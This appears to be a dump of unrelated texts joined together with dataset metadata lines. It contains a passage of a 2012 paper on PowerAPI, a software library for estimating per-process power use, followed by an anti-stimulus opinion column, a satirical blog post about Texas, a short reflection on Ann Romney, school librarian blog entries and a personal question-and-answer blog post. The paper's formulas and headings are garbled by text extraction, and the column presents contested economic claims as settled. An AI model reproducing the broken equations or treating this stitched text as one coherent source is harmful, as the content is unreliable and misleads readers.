takes into consideration these characteristics of the CPU and allows accurate power consumption monitoring. According to formula 2, calculating the overall CPU power for a given time is equal to calculating a static part (the constant c) and a dynamic part (the frequency f and its associated voltage V). For the static part, the c constant is a set of data describing the physical CPU (e.g., capacitance, activity factor). Manufacturers may provide this constant, but in most of the cases this value is not available. To alleviate this problem, we use the existing relation between the overall power of a processor and its Thermal Design Power (TDP) value. TDP represents the power the cooling system of a computer is required to dissipate the heat produced by the processor. Therefore, the overall CPU power can be associated with the TDP as described by [8]: fT DP,VT DP PCP'0.7 × T DP U where fT DP and VT DP represent respectively the frequency and the voltage of the processor within the TDP state. The benefit of using this formula is that TDP is a value provided by most manufacturers. For the dynamic part, the frequency f is associated to a specific voltage V. One or more frequencies can be associated to a specific voltage. Lowering the voltage results in changing frequency. The other way around is also valid. Frequencies used by a processor are provided by the operating system APIs, while voltages are given by manufacturers. Process CPU usage:
In order to calculate the CPU usage for a given process (identified by its PID), we propose to calculate the ratio between the CPU time for this PID and the global CPU time (the time the processor is active for all processes) during a duration d: P ID UCP U (d) = ID tP CP U (d) tCP U Our approach is inspired by well-known tools, such as the top linux program2. Thus, Pcomp of formula 1 and for the CPU power consumption in a duration d is equal to : Pcomp = 0.7 × T DP tP ID × f × V 2 × CP U (d) 2 fT DP × VT DP tCP U 2)
Network Model:
The network power of a process is calculated using a formula similar to the CPU power formula. We base our model on available information whether they are collected at runtime or provided by manufacturers’ documentations. As a first step, we focus on Ethernet network cards. A similar model using a linear equation can be applied for wireless network cards [9], but we did not investigate wireless cards yet. We obtain, from manufacturers’ documentations the power consumed (in watt) for transmitting bytes for a certain duration (typically one second) according to a given throughput mode of the network card (e.g., 1 MB, 10 MB, etc.). Our network power model is therefore defined as: P t i × Pi × d P ID Pnetwork = i∈states ttotal where Pi is the power consumed by the network card in the state i (provided by manufacturers), d is the duration of the monitoring cycle, and ttotal is the total time spent in transmitting data with the network card. Based on these models, our formula 1 is now equal to:
Psof tware = ID tP 0.7 × T DP 2 CP U × f × V × (d) fT DP × VT2DP tCP U P ti × Pi × d + i∈states ttotal
IV
.
I MPLEMENTATION
P OWER API is implemented as a system level modular library. We implemented so far the CPU and network modules and associated power models. Our system-level library aims to provide power information per PID for each system component (CPU, NIC3, etc.). The library is therefore based on a modular approach where each system component is represented as a power module. Power modules operate independently of each other and are composed by two sub-modules: formula and sensor. These sub-modules communicate using the Service-Oriented Architecture (SOA) paradigm, and are deployed in an OSGi 4 gateway. In particular, we use Service-Oriented Framework (SOF5 ) to implement the various modules of P OWER API in C++. 2 http://linux.die.net/man/1/top 3 Network Integrated Card 4 formerly Open Service Gateway Initiative 1 Complementary Metal Oxide Semiconductor 5 http://sof.tiddlyspot.com The sensor sub-module is responsible for gathering hardware and operating system related information for the module. For example, it gathers the number of bytes transmitted by the network card, and the time spent by the CPU for each of the processor frequencies (when DVFS is supported). This sub-module is OS-dependent. We implemented sensor submodules for the CPU and NIC on a GNU/Linux operating system. In particular, our implementation exploits system information available in the procfs [10] and sysfs [11] file systems. The formula sub-module, on the other hand, is platform independent. The sub-module is responsible for computing the power consumed for each process by using information gathered by the sensor sub-module. Additionally, our library supports the lifecycle management of its power modules. The latter can be started, stopped and their parameters changed at runtime, using a modules manager. The benefit of this modular approach is to offer flexibility while monitoring the system.
Figure 2. Stressing the processor cores using the STRESS command. Validation
We validate the accuracy and precision of P OWER API prototype on a Dell Precision T3400 workstation with an Intel Core 2 Quad processor (Q6600), running Ubuntu Linux 11.04. Our goal is to evaluate implementations of a CPU intensive algorithm, Towers of Hanoi. Therefore, we will only outline the results of the CPU module. We compared the power values provided by P OWER API with the actual power consumption of the computer using a bluetooth powermeter, PowerSpy6. First, we stress the processor using the Linux stress command7. Figure 2 depicts the results as an evolution of the CPU power consumption along time (normalized values). The peaks correspond to stressing 1, 2, 3 and 4 cores, respectively. Figure 3 shows the accuracy of our library where we outline the measure
d values
using the
powermeter
and the
values
provided by P OWER API
, exclu
ding the preliminary synchronization values. We also compare the values of our library and the powermeter when viewing a video using MPlayer8 (results in Figure 4). Note that due to synchronization time lag between the Bluetooth powermeter and our library, values are shifted for a few seconds in the beginning of the monitoring. The time lag disappears after a couple of minutes. The results show minor variations between the estimations computed by our library, and the real power consumption values. The margin of error is small in the core stressing and MPlayer scenarios at around 0.5% of the normalized and averaged values. Therefore, we can reasonably argue that using software-only approach, we provide values that are accurate enough to be used by energy management software.
Figure 3. The accuracy of P OWER API when stressing the processor cores. 6 http://www.alciom.com/en/products/powerspy2.html 7 http://linux.die.net/man/1/stress 8 http://www.mplayerhq.hu Figure 4. Running a video under MPlayer.
V. I MPACT OF A LGORITHMS AND P ROGRAMMING L ANGUAGES
We run our P OWER API library on a number of implementations of the Towers of Hanoi mathematical program, all taken from the hanoimania page9. We measured the power consumption and execution time of eight implementations: three benchmarks of the iterative implementation in C++ including one using the O2 and O310 GNU Compiler Collection (GCC) compiler options, three benchmarks of the recursive implementation in C (including O2 and O3), and recursive versions of Java, Python, OCaml, Pascal, Prolog and Perl programming languages. P OWER API provides power values (in watt), and we configured our library to take measurements at a 200 ms interval or 5 Hz, and we run the Towers of Hanoi program with 30 disks. Figures 5 and 6 reports on the energy consumption (calculated in joule using the execution time) of the different implementations.
Figure 5. Energy consumption of the recursive and iterative implementations of Tower of Hanoi program in C++. Overall, we found that all implementations use up to 100% of one of the processor cores. In average, this equals to around 18 watts in our host configuration (ranging from 17.5 to 18.2 watts). However, the execution time varies greatly between the implementations and the algorithms. Recursive and iterative versions: We first compare the difference between the recursive and iterative versions of the Towers of Hanoi program. The recursive algorithm implemented in C++ consumed in average 322.23 joules while its iterative version consumed 1656.26 joules, more than 400% increase. When using the O2 optimization option during compilation, both versions exhibit a similar energy consumption (on average 7% difference), however with the O3 option, the iterative version does not save any energy. The recursive version shows a 78% decrease in energy consumption using the O3 option in comparison with the O2 option. O2 turn on more than 50 optimization flags in GCC and G++ compilers, while O3 adds 6 more flags including Predictive Commoning optimization (to eliminate redundancies across the iterations of a loop11 ) that recursive algorithms benefit from in comparison to iterative ones. Our results show that the recursive version of the Towers of Hanoi program is more energy efficient than its iterative version. Implementations in programming languages: In addition to energy efficiency differences in algorithm implementations, we observe that the energy consumed by the same algorithm varies from language to language. Both C and C++ recursive versions show similar results (55.45 joules for C and 53.20 joules for C++ with O3). The C recursive version consumed nearly 268% more energy than its Java counterpart. Compiling the program with the O2 optimization option allowed a gain of around 20%, but still 188% more energy consuming than Java. However, when compiling the program with all optimizations (option O3), energy consumption was greatly reduced to become even better than Java (37% decrease of C compared to Java). Contrary to some beliefs, our results show that Java, using the default options, is quite energy efficient in comparison to other programming languages. Using only default values, the Java recursive version is the more energy efficient in our tests. Only the C recursive version with the O3 option performs better. We also observed the energy efficiency of the Pascal language, being on par with the default C or C++. However, other results are more interesting: Perl is the most consuming (25 516 joules, executing for 23 minutes), Python being second (9 450 joules and less than 9 minutes), then Prolog (3 673 joules with 3.5 minutes), and finally Ocaml (with 1 375 joules and 1.2 minutes). The difference between the most energy consuming (Perl) and the most energy efficient (C++ with O3) is quite high: 25 463 joules (or 47 863% increase). It is important to note here that our comparison tests are for one CPUintensive application (Towers of Hanoi). Other tests are needed in order to make a proper conclusion about the energy efficiency of a programming language compared to another. However, our results offers a preliminary indication of energy-efficiency trends in programming languages for CPU intensive applications. Nevertheless, implementing additional tests is one of our future work directions. It is also important to note that although a CPU time profiler can offer an idea about the energy efficiency of a Tower of Hanoi program (due to the fact that the algorithm uses 100% of the processor nearly all the time), it is not always the case. Our test on a video playback on MPlayer (cf. Figure 4) shows a variation of power consumption of 9 http://www.kernelthread.com/projects/hanoi/ 10 http://gcc.gnu.org/onlinedocs/gcc/Optimize-Options.html 11 http://gcc.gnu.org/wiki/PredictiveCommoning
Figure 6. Energy consumption of the recursive implementation of Tower of Hanoi program in different languages (using a base 10 logarithmic scale). more than 130% increase.
In this situation, a CPU time profiler is rendered less useful for energy monitoring. When adding other hardware resources (such as the video card or the memory), a comprehensive power model therefore becomes crucial for energy monitoring. VI. R ELATED W ORKS
Monitoring energy consumption of hardware components usually requires an hardware investment, like a multimeter or a specialized integrated circuit. For example in [3], the energy management and preprocessing capabilities is integrated in a dedicated ASIC (Application Specific Integrated Circuit). It continuously monitors the energy levels and performs power scheduling for the platform. However, this method has the main drawback of being difficult to upgrade to newer and more precise monitoring and it requires that the hardware component be built with the dedicated ASIC, thus making any evolution impossible without replacing the whole hardware. On the other hand, an external monitoring device provides the same accuracy as ASIC circuits and does not prohibit energy monitoring evolutions. Devices, such as A LERT M E S MART E NERGY12, monitor home devices and allow users to visualize their energy consumption history through application services, such as the now defunct G OOGLE P OWERMETER 13. However, these approaches do not adapt the system autonomously: the user takes the decision, while our approach opens up solutions for adapting applications with limited user intervention. The previous monitoring approaches allow getting energy measures about hardware components only. However, knowing the energy consumption of software services and components requires an estimation of that consumption. This estimation is based on calculation formulae as in [7] and [12]. In [7], the authors propose formulae to compute the energy cost of a software component as the sum of its computational and communication energy costs. For a Java application running in a virtual machine, the authors take into account the cost of the virtual machine and eventually the cost of the called OS routines. In [12], the authors take into account the cost of the wait and idle states of the application (e.g., an application consumes energy when waiting for a message on the network). In [4], the authors propose a tool, P OWER S COPE, for profiling energy usages of applications. This tool uses a digital multimeter to sample the energy consumption and a separate computer to control the multimeter and to store the collected data. P OWER S COPE can sample the energy usage by process. This sampling is more precise than energy estimation, although it still needs a hardware investment. P T OP [5] is a process-level power profiling tool. Similar to the Linux TOP program, the tool provides the power consumption (in Joules) of the running processes. For each process, it gives the power consumption of the CPU, the network interface, the computer memory and the hard disk. The tool consists in a daemon running in the kernel space and continuously profiling resource utilization of each process. It obtains these information by accessing the /proc directory. For the CPU, it also uses TDP provided by constructors in the energy consumption calculations. It then calculates the amount of energy consumed by each application in a t interval of time. It also consists of a display utility similar to the Linux TOP utility. A Windows version is also available, so called P T OP W, and offers similar functionalities, but using Windows APIs. In addition to P T OP, several utilities exist on Linux for resource profiling. For example, CPUFREQUTILS14, in particular CPUFREQ - INFO to get kernel information about the CPU (i.e., frequency), and CPUFREQ - SET to modify CPU settings, such as the frequency. iostat15 that is used to 12 http://www.alertme.com/smart energy 14 http://kernel.org/pub/linux/utils/kernel/cpufreq/cpufrequtils.html 13 http://www.google.com/powermeter 15 http://linux.die.net/man/1/iostat get devices’ and partitions’ input/output (I/O) performance information, as well as CPU statistics. Other utilities [13] also exist with similar functionalities, such as SAR, MPSTAT, or the system monitoring applications available in Gnome, KDE or Windows. In [14], the authors propose G REEN T RACKER, a tool that presents an insight of the energy consumption of different software groups by estimating their CPU utilization. However, all of these utilities only offer raw data (e.g., CPU frequency, utilized memory) and do not offer power information. Our approach is more flexible and evolutive than P T OP. In addition to offering process-level energy information, P OWER API offers better flexibility and on-demand scaling of the tool. Monitoring modules can be shutdown or started depending on the context: on limited resources devices, modules, such as the network or hard disk modules, can be shutdown in order to monitor only the CPU. When more resources become available, these modules will be re-started. Other situations are also possible, such as situations where the user is only interested in monitoring the CPU or the network energy consumption.
VII. C ONCLUSION AND F UTURE W ORKS
In this paper, we present the P OWER API architecture. It allows gathering and calculating the power consumption of processes and applications. We also propose energy models to calculate the energy consumption. Our models use and extend the state-of-the-art models and formulae. Our initial results show the potential of our approach for comparing, at runtime, the power consumption of applications and algorithms. As for future work, we plan to: i) propose more energy models for other hardware resources (in particular, memory and disk); ii) propose power monitoring at a finer grain, such as Java threads and methods; iii) extend our experimentation to more applications and algorithms, such as J ETTY application server or network intensive applications; and iv) use power-aware information to adapt applications at runtime based on energy concerns.
GMENT
[1] Gartner, “Green IT: The New Industry Shockwave,” in Gartner, Presentation at Symposium/ITXPO Conference, 2007. [2] M. Webb, SMART 2020: enabling the low carbon economy in the information age, a report by The Climate Group on behalf of the Global eSustainability Initiative (GeSI). GeSI, 2008. [3] D. McIntire, T. Stathopoulos, and W. Kaiser, “ETOP: sensor network application energy profiling on the LEAP2 platform,” in IPSN’07: Proceedings of the 6th international conference on Information processing in sensor networks. ACM, 2007, pp. 576–577. [4] J. Flinn and M. Satyanarayanan, “PowerScope: A Tool for Profiling the Energy Usage of Mobile Applications,” in WMCSA’99: Proceedings of the Second IEEE Workshop on Mobile Computer Systems and Applications. IEEE Computer Society, 1999, p. 2. [5] T. Do, S. Rawshdeh, and W. Shi, “pTop: A Process-level Power Profiling Tool,” in HotPower’09: Proceedings of the 2nd Workshop on Power Aware Computing and Systems, 2009. [6] W. Vereecken, W. Van Heddeghem, D. Colle, M. Pickavet, and P. Demeester, “Overall ict footprint and green communication technologies,” in ISCCSP’10: 4th International Symposium on Communications, Control and Signal Processing, 2010, pp. 1 –6. [7] C. Seo, S. Malek, and N. Medvidovic, “An energy consumption framework for distributed java-based systems,” in ASE’07: Proceedings of the 22nd IEEE/ACM international conference on Automated software engineering. ACM, 2007, pp. 421–424. [8] S. Rivoire, M. A. Shah, P. Ranganathan, and C. Kozyrakis, “JouleSort: a balanced energy-efficiency benchmark,” in SIGMOD’07: Proceedings of the 2007 ACM SIGMOD international conference on Management of data. ACM, 2007, pp. 365–376. [9] L. Feeney and M. Nilsson, “Investigating the energy consumption of a wireless network interface in an ad hoc networking environment,” in INFOCOM 2001: 20th Annual Joint Conference of the IEEE Computer and Communications Societies. Proceedings. IEEE, vol. 3, 2001, pp. 1548–1557. [10] Erik Mouw, “Linux Kernel Procfs Guide,” http://www.compsoc.man.ac.uk/∼moz/kernelnewbies/ documents/kdoc/2.5/procfs-guide.pdf, 2001. [11] Patrick Mochel, “The sysfs Filesystem,” //www.kernel.org/pub/linux/kernel/people/mochel/doc/ papers/ols-2005/mochel.pdf. http: [12] A. l and F. Zhao, “Fine-grained energy profiling for power-aware application design,” SIGMETRICS Perform. Eval. Rev., vol. 36, no. 2, pp. 26–31, 2008. [13] V. Gite, “How do I Find Out Linux CPU Utilization?” http://www.cyberciti.biz/tips/ how-do-i-find-out-linux-cpu-utilization.html. [14] N. Amsel and B. Tomlinson, “Green tracker: a tool for estimating the energy consumption of software,” in CHI EA’10: Proceedings of the 28th of the international conference extended abstracts on Human factors in computing systems. ACM, 2010, pp. 3337–3342. | common_corpus | {'identifier': 'c6b7ca7ac16897dc6a24af699d5f93e5_1', 'collection': 'French-Science-Pile', 'open_type': 'Open Science', 'license': 'Various open science', 'date': '2012.0', 'title': 'A Preliminary Study of the Impact of Software Engineering on GreenIT. First International Workshop on Green and Sustainable Software, Jun 2012, Zurich, Switzerland. pp.21-27. ⟨hal-00681560v3⟩', 'creator': 'None', 'language': 'English', 'language_type': 'Spoken', 'word_count': '4889', 'token_count': '6827', '__index_level_0__': '2158', 'original_id': '6151930e50d250be84a7b7610635adbb43cd457a0a1f6cc86b1230c95f56c1c5'} |
Subscribe to Mic Daily
We’ll send you a rundown of the top five stories every day
After three years and $4 trillion in combined deficit spending, unemployment remains stubbornly high and the economy sluggish. That people are still asking what the government can do to stimulate the economy is mind-boggling.
That the Keynesian-inspired deficit spending binge did create jobs isn't in question. The real question is whether it created any net jobs after all the negative effects of the spending and debt are taken into account. How many private-sector jobs were lost or not created in the first place because of the resources diverted to the government for its job creation? How many jobs are being lost or not created because of increased uncertainty in the business community over future tax increases and other detrimental government policies?
Don't expect the disciples of interventionist government to attempt an answer to those questions any time soon. It has simply become gospel in some quarters that massive deficit spending is necessary to get the economy back on its feet.
The idea that government spending can “make up for” a slow-down in private economic activity has already been discredited by the historical record – including the Great Depression and Japan's recent "lost decade."
Our own history offers evidence that reducing the government's footprint on the private sector is the better way to get the economy going.
Take for example, the "Not-So-Great Depression" of 1920-21. Cato Institute scholar Jim Powell notes that President Warren G. Harding inherited from his predecessor Woodrow Wilson “a post-World War I depression that was almost as severe, from peak to trough, as the Great Contraction from 1929 to 1933 that FDR would later inherit.” Instead of resorting to deficit spending to "stimulate" the economy, taxes and government spending were cut. The economy took off.
Similarly, fears at the end of World War II that demobilization would result in double-digit unemployment when the troops returned home were unrealized. Instead, spending was dramatically reduced, economic controls were lifted, and the returning troops were successfully reintegrated into the economy.
Therefore, the focus of policymakers in Washington should be on fostering long-term economic growth instead of futilely trying to jump-start the economy with costly short-term government spending sprees. In order to reignite economic growth and job creation, the federal government should enact dramatic cuts in government spending, eliminate burdensome regulations, and scuttle restrictions on foreign trade.
The budgetary reality is that policymakers today have no choice but to drastically reduce spending if we are to head off the looming fiscal train wreck. Stimulus proponents generally recognize that our fiscal path is unsustainable, but they argue that the current debt binge is nonetheless critical to an economic recovery.
There’s no more evidence for this belief than there is for the existence of the tooth fairy.
Not only has Washington's profligacy left us worse off, our children now face the prospect of reduced living standards and crushing debt.
Photo Credit: Wikimedia Commons | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '9', 'language_id_whole_page_fasttext': "{'en': 0.9554554224014282}", 'metadata': "{'Content-Length': '248400', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:FMMFB5UA254MABJ4GIXUUUQKH5JCTGN2', 'WARC-Concurrent-To': '<urn:uuid:0715fb67-bd8f-4580-b7de-b70031f32a6a>', 'WARC-Date': datetime.datetime(2018, 11, 18, 10, 0, 50), 'WARC-IP-Address': '52.45.106.48', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:JL2YHC6O5C5XCIZZLFMVEOGT34INOBVW', 'WARC-Record-ID': '<urn:uuid:baa59034-871b-4ec3-8255-a2ed53c40c1f>', 'WARC-Target-URI': 'https://mic.com/articles/2474/we-ve-had-enough-government-stimulation', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:b0c767ca-bf09-4a14-ab03-09af84802091>', 'WARC-Truncated': None}", 'previous_word_count': '489', 'url': 'https://mic.com/articles/2474/we-ve-had-enough-government-stimulation', 'warcinfo': 'isPartOf: CC-MAIN-2018-47\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November 2018\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-237-200-77.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.17171186208724976', 'original_id': '45ef5560a2fa4a452f9a5efb6149ca27dfd6cf164cd65391b68a4adc9c168a73'} |
Help Me Reach 12 on the Manly Scale of Absolute Gender
Wednesday, April 15, 2009
Really Short Soap Opera
From this week's episode of Dusty Sands...
STATE OF TEXAS: I'm telling it to you the way it is, baby! I will walk out that door and never come back!
AMERICA: Yeah, and for ten bucks I'll pretend to give a shit.
ANNOUNCER: Thank you for tuning in to this week's episode of Dusty Sands...
1. I'm really torn on how to react to this.
"If we promise to miss you, will you go away?"
"Don't let the Constitution hit you in the ass on the way out."
2. Fran did a wunnerful job with this bit, and then CCMcGoon posted it over to the homestead, in case anybody wants to see it.'m back online, btw. Howdy.
3. I have this theory that every nation above a certain size has a region that considers itself to be it's own place first and part of the larger country second. Usually this is a place that the rest of the nation considers to be kind of backwards.
In Germany it's Bavaria, in Canada it's Quebec, in Japan it's Hokkido, China and India have several such provinces. In the US it's Texas.
That's why I call it the "Everywhere has a Texas" theory.
We'll try dumping haloscan and see how it works. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '20', 'language_id_whole_page_fasttext': "{'en': 0.9595552682876588}", 'metadata': "{'Content-Length': '111519', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:WUXLQ6EI6B6OQWQLPBS3FDM4CWR7RFNI', 'WARC-Concurrent-To': '<urn:uuid:c5876608-877c-4582-8b9a-33e00098b36f>', 'WARC-Date': datetime.datetime(2017, 3, 24, 15, 58, 12), 'WARC-IP-Address': '216.58.217.65', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:LMYGAFD3B7JYUOLDDOPQYJYHPCEMLISD', 'WARC-Record-ID': '<urn:uuid:c8a53cca-5388-4f37-a5ec-4a486347d649>', 'WARC-Target-URI': 'http://patriotboy.blogspot.com/2009/04/really-short-soap-opera.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:f0ad3f28-68b7-469a-be9d-f9b829c37640>', 'WARC-Truncated': None}", 'previous_word_count': '256', 'url': 'http://patriotboy.blogspot.com/2009/04/really-short-soap-opera.html', 'warcinfo': 'robots: classic\r\nhostname: ip-10-233-31-227.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2017-13\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for March 2017\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.24149924516677856', 'original_id': '2bed6bcd01c8df19d389b673762d28f9a333fa6f8a446d76040fb130e9870d01'} |
Ann Romney
In a recent interview, Ann Romney talked about Multiple Sclerosis, horses, and joy. She said that her horses brought her joy that enabled her to cope with her MS. She found that, by doing things she was passionate about, she was better able to cope with an unpredictable illness.
Her interview made me realize that we all need joy and passion in our lives. It’s what makes us come alive. It enables us to cope with day-to-day life.
What brings you joy? What are you passionate about? Do you make time for those things in your busy schedule? | mini_pile | {'original_id': 'd03f647ace227c481e093d2b964ae6256438b5583c451c64aa05cd484a4286b0'} |
Pages
Monday, November 23, 2015
I attended the Schools Without Walls (SWOW) annual conference just a few weeks ago. The conference was held in Hot Springs, Arkansas. I enjoy attending the conference each year to learn the latest about educational technology! The sessions always challenge my thinking.
This year, I was excited to hear a presentation by keynote speaker Ginger Lewman (follow her on Twitter @GingerLewman). Ginger asked great questions:
"Are we transforming curriculum with technology or are we substituting digital worksheets for paper worksheets?" This helped me reflect about my role as a library media specialist and technology consultant. I can help teachers enhance curriculum in their classroom with technology... In what ways am I doing this? (something we should all ponder as school librarians)
"How do we ensure that all students have the opportunity to learn outside of our walls?"
My three biggest takeaways from SWOW:
Genius Hour
Ginger explained that this comes from Google's 20% time for their employees. Students can use designated "Genius Hour" time to explore/ create projects of their choosing. The library is a great place to try this since we have so many resources for students to utilize. I love the idea of encouraging learners to come up with solutions to problems. The school library is a perfect spot to research and experiment! I want to try this soon!
Educational Video Games
I attended a session by Chad Freeman on this topic. Chad is a teacher at Ashdown High School in Ashdown, Arkansas. He challenged my thinking on gaming by discussing why people game. The main reasons being that the best games are complex and engaging. Video gamers also receive instant feedback and are encouraged to try again (something we should adopt in all aspects of education). Chad provided names of some excellent games for classroom use:
Democracy3Minecraft EDUCities SkylinesBesige
I have forwarded information about Cities Skylines to our Civics teachers. This game looks like an excellent opportunity to have learners develop a virtual local government and build/ maintain a city. I will have to examine the other games as time permits! This is an ever emerging way to engage our learners in a video game environment.
Photo found at
https://i.ytimg.com/vi/u2t3KAIo1iM/maxresdefault.jpg
Live Internet Radio and Podcasting
I really enjoyed the session about Internet Broadcasting led by Arkansas educators Jeff Madlock and David Henderson (on Twitter @edutechguys)! They discussed the many ways that teachers can broadcast from their classroom. Jeff and David presented many different possibilities for podcasting in the classroom. Among these were class reviews, class discussions, class presentations, school news, and interviews. Jeff (@jmadlock) and David (@davidinark) have a regular podcast where they interview educators. You can listen to their previous broadcasts here.
Some of the websites with free options (with the opportunity for expanded paid plans) they presented:
Both of these sites are wonderful options to reach students where they are (almost every learner has a device of some type that can access digital audio/ podcasts). I'm already interested in this since two of our Lakeside High School history teachers (Mr. Kevin Pumphrey and Mr. Ron Franklin) have just started podcasting from their classrooms. They have been using a YouTube channel (History After Hours Podcast) to post their episodes. I attended one of their combined class discussions one day and was very impressed with how engaged their students were! It's a great day when we can engage students using technology that models digital citizenship!
Friday, November 13, 2015
On October 29th, our library hosted Africa Day for the third
time (go here to see how this event started in 2012). Once again the library staff,
tenth grade English teachers, and Chartwells collaborated to make this year’s
Africa Day the best yet! The tenth grade
students are reading Chinua Achebe’s Things Fall Apart and this event
was developed to help the students have a better understanding of the Igbo
people of Nigeria in the late 1800’s.
Stations
This year we focused on giving students more time at each
station. Students participated in four
learning stations: food, art, music, and
games. Students spent twelve minutes at
each station; this provided them an opportunity to go more in depth and have a
more meaningful experience.
Taste of Africa was our food station; Chartwells (our food
services) prepared a goat and yam stew, fufu, and wine (grape juice). The students ate the stew with great
reluctance; however, they soon realized that it, in fact, tasted like
chicken! The fufu acted as a type of
“cornbread” to dip into the stew. This
station provided the students an opportunity to actually taste a meal that
would be prepared in Africa. One student
shared, “The spices were absolutely perfect and I wish I could do it again and
again!”
The art station
consisted of African masks, art, and face painting. This station was 100% student led; the art
students made the masks and presented how and why the masks are used in
Africa. A popular part of this station
was face painting. Students chose a
particular design and color; the designs were symbolic of various traits:
strength, masculinity, courage, honor, etc.
Our video station
encouraged students to not only hear rhythms but to also see that rhythm is a
part of the African experience. One
student commented that, “It was really interesting seeing how rhythm was a part
of their daily life.” In addition to the
video, our students were able to beat out some rhythms of their own on a djembe
drum!
This year we
introduced a game station; this station will definitely be a permanent part of
Africa Day! A symbolism matching game
and two authentic African children games were a fun addition to this collaboration. The symbolism game was added to emphasize the
importance of symbolism in the novel.
The African games were Ekak and Nanpe.
The object of Ekak is to find a ring that has been buried in a pile of
sand or sawdust; once the ring has been
hidden, children take turns by inserting a stick into the pile. The person who finds the ring will be named
king and allowed to hide the ring for the next players. This game was rather messy, but the students
really enjoyed this hands-on activity!
Nanpe is much like a dice game, but instead of throwing dice you throw
sticks. Players will form a circle and
have four sticks; the sticks are brown on one side and white on the other. The players will take turns and throw the
sticks into the air and earn points based on how the sticks land. If two colors land up, the player earns two
points and if four colors land up, the player earns four points. The first person to reach eight points wins
the game!
Feedback
We also added a post collaboration survey. Students were asked a series of questions to
determine what worked and what didn’t work!
We will use this data to better prepare for our future collaborations. Our goal for Africa Day was to expose
students to a new culture and in turn help them better understand the setting
of the novel, Things Fall Apart.
When asked if the Africa Day experience helped them to better understand
the novel: 54% of students surveyed
answered yes, 43% answered somewhat and only 3% answered no. Students answering no were either not present
for the event or felt that they had no understanding of the book. Our most exciting data was that 89% of
students surveyed would like to see more collaborative projects in the future!
Conclusion
Based on our student feedback, I feel that we are moving in
the right direction! Students want to be
engaged; collaborations are a way for the learning community to tap into
resources and discover innovative ways for students to learn.
Wednesday, November 4, 2015
On a Saturday in late September, one of our Lakeside High School Assistant Principals, Mr. Mathew Thornton, (@Mat_Thornton) mentioned me in a Tweet. The message was from Dina Moati (@dinamoati) who is a Professor of Education in Ontario, Canada.
After seeing that Dina was looking for volunteers to speak to her class of aspiring educators, I Tweeted a message to her immediately! I love sharing about how Twitter has changed me professionally! I have also been looking for opportunities to connect our learning community to educators outside of the United States.
Dina Moati leads the Virtual Experts Panel
I knew this could be a first step to lead the way to more international collaboration! Dina messaged me back and the date was set.
Stephan Hughes
This event took place for two of Dina's classes as a Google Hangout forum with two other educators: Stephan Hughes from Rio de Janeiro (@stephwurking) and Tammy G. Neil from Florida (@TG_Neil).
Tammy G. Neil
We started the two sessions by introducing ourselves and telling about what we do. Dina would turn her camera to the class so we could see them on our screens and we would all wave greetings to each other. We then discussed ways that we use social media in the profession of education. We took turns answering some of these questions and topics:
"What is a connected educator?"
"Discuss how you use technology in the 21st century classroom"
"What are your favorite hashtags to follow?"
I had never participated in a discussion on webcam like this before. It was so much fun to connect with new friends in Canada, Florida, and Rio de Janeiro simultaneously! I began thinking of what an impact this demonstration must have had on Dina's students. She was modeling a wonderful practice for her college students.
Dina's class in Canada
Furthermore, I considered what this could look like in a high school classroom. We have such wonderful tools for connecting our students to other places, yet our time is limited. I plan to encourage our teachers to make time for these activities! I want to encourage them to be risk takers by stepping out of their comfort zones to connect their students to other classrooms outside of our town, state, and country. I hope they will use the school library whenever possible to embark on their educational journeys. The adventure is only just beginning! What happens next?... Whatever we decide! How will you model social media and being connected to your learning community? | mini_pile | {'original_id': 'bde32f5f85391ec0709a90441c50799fdd7b98e578da9687f1d3bb5fe726b031'} |
Barefoot by the Sea: Wednesday Classical Hodgepodge: Just in Time!
Wednesday, September 14, 2016
Wednesday Classical Hodgepodge: Just in Time!
Hello, it is Wednesday and it is time for the Hodgepodge.
Joyce asks the questions.
We answer the questions.
1. What's changed in your life, home, or community since your last birthday? Our city started building a new high school which is very exciting for the area. The goal is a state of the art facility that will offer more for our youth. These things take time, but I'm hoping my kiddos benefit from it!
2. September is Classical Music Month. Do you like/listen to classical music? If so what's a favorite piece and/or who is a favorite composer? I do like Classical Music but don't have a favorite composer. There's nothing better than a lazy day, listening to peaceful music and diffusing some essential oils. Can you feel my zen ;)?
3. Besides The Bible, what's a book that has positively changed your life, relationships, career, or perspective? How so? The Book of Awakening: Having the Life You Want by Being PResent to the Life You Have by Mark Nepo This was a life changer for me, offering a daily reflection to encourage growth, perspective and happiness.
4. I read (here) these ten hobbies will make you a musical instrument, read voraciously, meditate regularly, work out your brain (puzzles, sudoku, board games, etc), exercise often, learn a new language, write your feelings down (blog, journal, just write), travel to new places, cook different kinds of meals, participate in sports actively.
Are any on this list your current hobbies? Which hobby on the list would you be most inclined to try? I exercise pretty much daily, try to blog often, love to travel and cook different kinds of meals. If I could pick one to concentrate on more? Having the time and means to TRAVEL with my family!
5. What sports traditions does your family have? We aren't a huge sports family but we do love a good game of badminton in the summer! I'd also love to catch a Red Sox game because, well, it's Fenway and I do enjoy with the Patriots (I know, you love them or hate them) have a good game - and well, good food to celebrate the Superbowl, so we always watch that!
